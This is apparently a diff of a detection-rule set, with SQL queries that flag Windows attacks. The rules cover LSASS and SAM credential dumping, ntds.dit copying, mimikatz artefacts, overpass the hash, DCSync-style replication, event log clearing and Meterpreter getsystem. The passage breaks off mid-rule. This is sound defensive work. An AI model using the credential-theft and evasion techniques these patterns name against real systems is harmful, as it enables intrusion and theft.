"description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the 
environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", + "author": "Mauricio Velazco, Michael Haag", "tags": [ "attack.credential_access", - "attack.t1552.001", - "cve.2021.36934" + "attack.t1187" ], "falsepositives": [ - "Files that accidentally contain these strings" + "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4768' AND TargetUserName LIKE '%$' ESCAPE '\\' AND CertThumbprint LIKE '%' ESCAPE '\\') AND NOT ((IpAddress = '::1') OR (CertThumbprint = '')))" ], - "filename": "file_event_win_hktl_hivenightmare_file_exports.yml" + "filename": "win_security_petitpotam_susp_tgt_request.yml" }, { - "title": "LSASS Memory Dump File Creation", - "id": "5e3d3601-0662-4af0-b1d2-36a05e90c40a", + "title": "Successful Overpass the Hash Attempt", + "id": "192a0330-c20b-4356-90b6-7b7049ae0b87", "status": "test", - "description": "LSASS memory dump creation using operating systems utilities. 
Procdump will use process name in output file if no name is specified", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", + "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "attack.s0002", + "attack.t1550.002" ], "falsepositives": [ - "Dumping lsass memory for forensic investigation purposes by legitimate incident responder or forensic invetigator", - "Dumps of another process that contains lsass in its process name (substring)" + "Runas command-line tool using /netonly parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%lsass%' ESCAPE '\\' AND TargetFilename LIKE '%dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '9' AND LogonProcessName = 'seclogo' AND AuthenticationPackageName = 'Negotiate')" ], - "filename": "file_event_win_lsass_memory_dump_file_creation.yml" + "filename": "win_security_overpass_the_hash.yml" }, { - "title": "Wmiexec Default Output File", - "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", - "status": "experimental", - "description": "Detects the creation of the default output filename used by the wmiexec tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Kerberos Manipulation", + "id": "f7644214-0eb0-4ace-9455-331ec4c09253", + "status": "test", + "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1047" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Unlikely" + "Faulty legacy applications" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
(TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('675', '4768', '4769', '4771') AND FailureCode IN ('0x9', '0xA', '0xB', '0xF', '0x10', '0x11', '0x13', '0x14', '0x1A', '0x1F', '0x21', '0x22', '0x23', '0x24', '0x26', '0x27', '0x28', '0x29', '0x2C', '0x2D', '0x2E', '0x2F', '0x31', '0x32', '0x3E', '0x3F', '0x40', '0x41', '0x43', '0x44'))" ], - "filename": "file_event_win_wmiexec_default_filename.yml" + "filename": "win_security_susp_kerberos_manipulation.yml" }, { - "title": "Suspicious Binary Writes Via AnyDesk", - "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", - "status": "experimental", - "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. 
(See reference section for more details)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Sysmon Channel Reference Deletion", + "id": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", + "status": "test", + "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4657' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND ObjectValueName = 'Enabled' AND NewValue = '0') OR (EventID = '4663' AND (ObjectName LIKE '%WINEVT\\\\Publishers\\\\{5770385f-c22a-43e0-bf4c-06f5698ffbd9}%' ESCAPE '\\' OR ObjectName LIKE '%WINEVT\\\\Channels\\\\Microsoft-Windows-Sysmon/Operational%' ESCAPE '\\') AND AccessMask = '65536')))" ], - "filename": "file_event_win_anydesk_writing_susp_binaries.yml" + "filename": "win_security_sysmon_channel_reference_deletion.yml" }, { - "title": "UAC Bypass Using .NET Code Profiler on MMC", - "id": "93a19907-d4f9-4deb-9f91-aac4692776a6", + "title": "DPAPI Domain Backup Key Extraction", + "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "status": "test", - "description": "Detects the pattern of UAC Bypass using .NET Code Profiler and mmc.exe DLL hijacking (UACMe 39)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", + 
"author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003.004" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pe386.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_dotnet_profiler.yml" + "filename": "win_security_dpapi_domain_backupkey_extraction.yml" }, { - "title": "Potential Persistence Via Outlook Form", - "id": "c3edc6a5-d9d4-48d8-930e-aab518390917", + "title": "RDP over Reverse SSH Tunnel WFP", + "id": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", "status": "experimental", - "description": "Detects the creation of a new Outlook form which can contain malicious code", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", + "author": "Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1137.003" + "attack.defense_evasion", + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1090.001", + "attack.t1090.002", + "attack.t1021.001", + "car.2013-07-002" ], "falsepositives": [ - "Legitimate use of outlook forms" + "Programs that connect locally to the RDP port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\FORMS\\\\IPM%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Local Settings\\\\Application Data\\\\Microsoft\\\\Forms%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND ((SourcePort = '3389' AND (DestAddress LIKE '127.%' ESCAPE 
'\\' OR DestAddress LIKE '::1' ESCAPE '\\')) OR (DestPort = '3389' AND (SourceAddress LIKE '127.%' ESCAPE '\\' OR SourceAddress LIKE '::1' ESCAPE '\\')))) AND NOT ((FilterOrigin = 'AppContainer Loopback') OR ((Application LIKE '%\\\\thor.exe' ESCAPE '\\' OR Application LIKE '%\\\\thor64.exe' ESCAPE '\\'))))" ], - "filename": "file_event_win_office_outlook_newform.yml" + "filename": "win_security_rdp_reverse_tunnel.yml" }, { - "title": "Potential SAM Database Dump", - "id": "4e87b8e2-2ee9-4b2a-a715-4727d297ece0", - "status": "experimental", - "description": "Detects the creation of files that look like exports of the local SAM (Security Account Manager)", - "author": "Florian Roth (Nextron Systems)", + "title": "Active Directory Replication from Non Machine Account", + "id": "17d619c1-e020-4347-957e-1d1207455c93", + "status": "test", + "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.credential_access", - "attack.t1003.002" + "attack.t1003.006" ], "falsepositives": [ - "Rare cases of administrative activity" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Temp\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.sav' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Intel\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.hive' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Perflogs\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\ProgramData\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Users\\\\Public\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Local\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\sam' ESCAPE '\\' OR TargetFilename LIKE '%\\_ShadowSteal.zip' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Documents\\\\SAM.export' ESCAPE '\\' OR TargetFilename LIKE '%:\\\\sam' ESCAPE '\\') OR (TargetFilename LIKE 
'%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.export%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\~reg\\_sam.save%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam\\_backup%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.bck%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sam.backup%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND AccessMask = '0x100' AND (Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\'))" ], - "filename": "file_event_win_sam_dump.yml" + "filename": "win_security_ad_replication_non_machine_account.yml" }, { - "title": "Suspicious Process Writes Ntds.dit", - "id": "11b1ed55-154d-4e82-8ad7-83739298f720", - "status": "experimental", - "description": "Detects suspicious processes that write (copy) a Active Directory database (ntds.dit) file", - "author": "Florian Roth (Nextron Systems)", + "title": "HybridConnectionManager Service Installation", + "id": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", + "status": "test", + "description": "Rule to detect the Hybrid Connection Manager service installation.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.003" + "attack.persistence", + "attack.t1554" ], "falsepositives": [ - "Unknown" + "Legitimate use of Hybrid Connection Manager via Azure function apps." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\ntds.dit' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceName = 'HybridConnectionManager' AND ServiceFileName LIKE '%HybridConnectionManager%' ESCAPE '\\')" ], - "filename": "file_event_win_susp_ntds_dit.yml" + "filename": "win_security_hybridconnectionmgr_svc_installation.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack - File", - "id": "614a7e17-5643-4d89-b6fe-f9df1a79641c", + "title": "PowerShell Scripts Installed as Services - Security", + "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName = 'System' AND TargetFilename LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "file_event_win_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": 
"win_security_powershell_script_installed_as_service.yml" }, { - "title": "UAC Bypass Using IEInstal - File", - "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", - "status": "test", - "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation CLIP+ Launcher - Security", + "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "file_event_win_uac_bypass_ieinstal.yml" + "filename": "win_security_invoke_obfuscation_clip_services_security.yml" }, { - "title": "Potential Persistence Via Microsoft Office Add-In", - "id": "8e1cb247-6cf6-42fa-b440-3f27d57e9936", - "status": "test", - "description": "Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).", - "author": "NVISO", + "title": "CVE-2023-23397 Exploitation Attempt", + "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "status": "experimental", + "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of 
CVE-2023-23397 exploitation.", + "author": "Robert Lee @quantum_cookie", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.credential_access", + "attack.initial_access", + "cve.2023.23397" ], "falsepositives": [ - "Legitimate add-ins" + "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.wll' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xll' ESCAPE '\\') OR (TargetFilename LIKE '%Microsoft\\\\Excel\\\\XLSTART\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.xlam' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\Microsoft\\\\Addins\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.xlam' ESCAPE '\\' OR TargetFilename LIKE '%.xla' ESCAPE '\\' OR TargetFilename LIKE '%.ppam' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" ], - "filename": "file_event_win_office_addin_persistence.yml" + "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" }, { - "title": "Legitimate Application Dropped Archive", - "id": "654fcc6d-840d-4844-9b07-2c3300e54a26", - "status": "experimental", - "description": "Detects programs on a Windows system that should not write an archive to disk", - "author": "frack113, Florian Roth", + "title": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", + "id": 
"8400629e-79a9-4737-b387-5db940ab2367", + "status": "test", + "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", + "author": "Florian Roth (Nextron Systems), Adam Bradbury (idea)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.lateral_movement", + "attack.t1210", + "car.2013-07-002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\visio.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\finger.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.zip' ESCAPE '\\' OR TargetFilename LIKE '%.rar' ESCAPE '\\' OR TargetFilename LIKE '%.7z' ESCAPE '\\' OR TargetFilename LIKE '%.diagcab' ESCAPE '\\' OR TargetFilename LIKE '%.appx' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4625' AND TargetUserName = 'AAAAAAA')" ], - "filename": "file_event_win_legitimate_app_dropping_archive.yml" + "filename": 
"win_security_rdp_bluekeep_poc_scanner.yml" }, { - "title": "UEFI Persistence Via Wpbbin - FileCreation", - "id": "e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f", - "status": "experimental", - "description": "Detects creation of a file named \"wpbbin\" in the \"%systemroot%\\system32\\\" directory. Which could be indicative of UEFI based persistence method", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Security Eventlog Cleared", + "id": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", + "status": "test", + "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.t1542.001" + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '517' AND Provider_Name = 'Security') OR (EventID = '1102' AND Provider_Name = 'Microsoft-Windows-Eventlog')))" ], - "filename": "file_event_win_wpbbin_persistence.yml" + "filename": "win_security_susp_eventlog_cleared.yml" }, { - "title": "LSASS Process Dump Artefact In CrashDumps Folder", - "id": "6902955a-01b7-432c-b32a-6f5f81d8f625", - "status": "experimental", - "description": "Detects the presence of an LSASS dump file in the \"CrashDumps\" folder. This could be a sign of LSASS credential dumping. 
Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process.", - "author": "@pbssubhash", + "title": "RDP Login from Localhost", + "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "status": "test", + "description": "RDP login with localhost source address may be a tunnelled login", + "author": "Thomas Patzke", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.lateral_movement", + "car.2013-07-002", + "attack.t1021.001" ], "falsepositives": [ - "Rare legitimate dump of the process by the operating system due to a crash of lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\CrashDumps\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%lsass.exe.%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" ], - "filename": "file_event_win_lsass_shtinkering.yml" + "filename": "win_security_rdp_localhost_login.yml" }, { - "title": "WMI Persistence - Script Event Consumer File Write", - "id": "33f41cdd-35ac-4ba8-814b-c6a4244a1ad4", + "title": "User Couldn't Call a Privileged Service 'LsaRegisterLogonProcess'", + "id": "6daac7fc-77d1-449a-a71a-e6b4d59a0e54", "status": "test", - "description": "Detects file writes of WMI script event consumer", - "author": "Thomas Patzke", + "description": "The 'LsaRegisterLogonProcess' function verifies that the application making the function call is a logon process by checking that it has the SeTcbPrivilege privilege set. 
Possible Rubeus tries to get a handle to LSA.", + "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", "tags": [ - "attack.t1546.003", - "attack.persistence" + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1558.003" ], "falsepositives": [ - "Dell Power Manager (C:\\Program Files\\Dell\\PowerManager\\DpmPowerPlanSetup.exe)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\scrcons.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4673' AND Service = 'LsaRegisterLogonProcess()' AND Keywords = '0x8010000000000000')" ], - "filename": "file_event_win_wmi_persistence_script_event_consumer_write.yml" + "filename": "win_security_user_couldnt_call_priv_service_lsaregisterlogonprocess.yml" }, { - "title": "DLL Search Order Hijackig Via Additional Space in Path", - "id": "b6f91281-20aa-446a-b986-38a92813a18f", - "status": "experimental", - "description": "Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\nbut with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\n", - "author": "frack113, Nasreddine Bencherchali", + "title": "NetNTLM Downgrade Attack", + "id": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Windows \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files \\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Program Files (x86) \\\\%' ESCAPE '\\') AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + 
"SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4657' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%ControlSet%' ESCAPE '\\' AND ObjectName LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND ObjectValueName IN ('LmCompatibilityLevel', 'NtlmMinClientSec', 'RestrictSendingNTLMTraffic'))" ], - "filename": "file_event_win_dll_sideloading_space_path.yml" + "filename": "win_security_net_ntlm_downgrade.yml" }, { - "title": "Mimikatz Kirbi File Creation", - "id": "9e099d99-44c2-42b6-a6d8-54c3545cab29", + "title": "AD Object WriteDAC Access", + "id": "028c7842-4243-41cd-be6f-12f3cf1a26c7", "status": "test", - "description": "Detects the creation of files created by mimikatz such as \".kirbi\", \"mimilsa.log\", etc.", - "author": "Florian Roth (Nextron Systems), David ANDRE", + "description": "Detects WRITE_DAC access to a domain object", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.credential_access", - "attack.t1558" + "attack.defense_evasion", + "attack.t1222.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%.kirbi' ESCAPE '\\' OR TargetFilename LIKE '%mimilsa.log' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectServer = 'DS' AND AccessMask = '0x40000' AND ObjectType IN ('19195a5b-6da0-11d0-afd3-00c04fd930c9', 'domainDNS'))" ], - "filename": "file_event_win_hktl_mimikatz_files.yml" + "filename": "win_security_ad_object_writedac_access.yml" }, { - "title": "Dumpert Process Dumper Default File", - "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", + "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", "status": "test", - "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the 
use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Very unlikely" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' 